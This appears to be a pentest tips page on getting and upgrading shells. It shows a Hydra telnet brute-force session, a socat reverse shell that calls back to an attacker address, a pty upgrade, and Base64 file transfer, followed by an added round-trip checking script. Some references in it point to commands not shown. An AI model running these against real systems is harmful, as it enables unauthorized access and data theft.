Some useful tricks for getting a shell
- Brute-forcing a telnet login with Hydra (sample session):
c:\PENTEST\thc-hydra>hydra -L username.txt -P passlist.txt 10.10.10.xx telnet
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-03-03 19:19:13
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:6/p:0), ~4 tries per task
[DATA] attacking telnet://10.10.10.xx:23/
[telnet] host: 10.10.10.98   login: admin   password: secretpw
[STATUS] 24.00 tries/min, 24 tries in 00:00h, 0 to do in 01:00h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-03-03 19:20:18
- You can set up a simple web server using Python or PHP.
python -m SimpleHTTPServer 8080   (Python 2; on Python 3 use: python3 -m http.server 8080)
A simple HTTP server will then be listening on TCP port 8080 on all interfaces.
php -S 127.0.0.1:8080
A simple HTTP server will then be listening on 127.0.0.1:8080 (loopback only).
- Upgrade a dumb shell to a pty with Python's "pty" module:
python -c "import pty; pty.spawn('/bin/bash')"
- Fully interactive shell with socat. On your localhost (attacker), listen on port 443:
socat file:`tty`,raw,echo=0 tcp-listen:443
On your victim, connect back (replace <LHOST_IP> with the attacker's address):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST_IP>:443
- Transferring a file as Base64 text. You will need to do all of this via the command line. Given you're already dealing with Base64 data, I am going to assume you know how to bring that up on your operating system. Scroll down to the relevant section based on your OS below, and substitute your file names as appropriate.
I am going to use .txt for the decoded data file extension and .b64 for the Base64 encoded file extension.
Note: encoding with the above command will leave a temporary file, tmp.b64, on your file system. If you do not wish to have that file present simply add this to the end of the command: && del tmp.b64
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
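The Base64 round trip above (encode to a .b64 text file, paste it across, decode back to the original bytes) is easy to get wrong when a prompt or a stray line gets pasted along with the data, so it is worth checking the result. The script below is an added example, not part of the original page: it wraps the encode and decode steps in shell functions and compares the SHA-256 of the decoded copy with the original. It assumes GNU coreutils `base64` and `sha256sum` are installed on the Linux side; the sample file it writes is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): Base64 round trip with an
# integrity check. Assumes GNU coreutils `base64` and `sha256sum`.

# Encode a file to .b64 text, wrapped at 76 columns so it pastes cleanly
# through a terminal.
b64_encode_file() {
    base64 -w 76 "$1" > "$2"
}

# Decode a .b64 text file back to the original bytes.
b64_decode_file() {
    base64 -d "$1" > "$2"
}

# Print the SHA-256 hex digest of a file; compare this value on both hosts.
file_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# Exit 0 if the decoded copy matches the original byte-for-byte, 1 otherwise.
verify_roundtrip() {
    [ "$(file_sha256 "$1")" = "$(file_sha256 "$2")" ]
}

# Demo on a constructed sample file in a temporary directory.
demo_roundtrip() {
    d=$(mktemp -d)
    printf 'constructed sample payload\n' > "$d/secret.txt"
    b64_encode_file "$d/secret.txt" "$d/secret.b64"
    b64_decode_file "$d/secret.b64" "$d/decoded.txt"
    if verify_roundtrip "$d/secret.txt" "$d/decoded.txt"; then
        echo "roundtrip ok, sha256 $(file_sha256 "$d/secret.txt")"
        rc=0
    else
        echo "roundtrip FAILED: digests differ" >&2
        rc=1
    fi
    rm -rf "$d"
    return $rc
}
```

Run `demo_roundtrip` after sourcing the script; in practice you would run `file_sha256` on the original host and on the receiving host and compare the two digests by eye before trusting the transferred file.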
Interesting links to read!
https://blog.ropnop.com/transferring-files-from-kali-to-windows/ (many techniques for transferring files from an attacker machine to a Windows box)
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ (techniques for upgrading simple shells to fully interactive TTYs)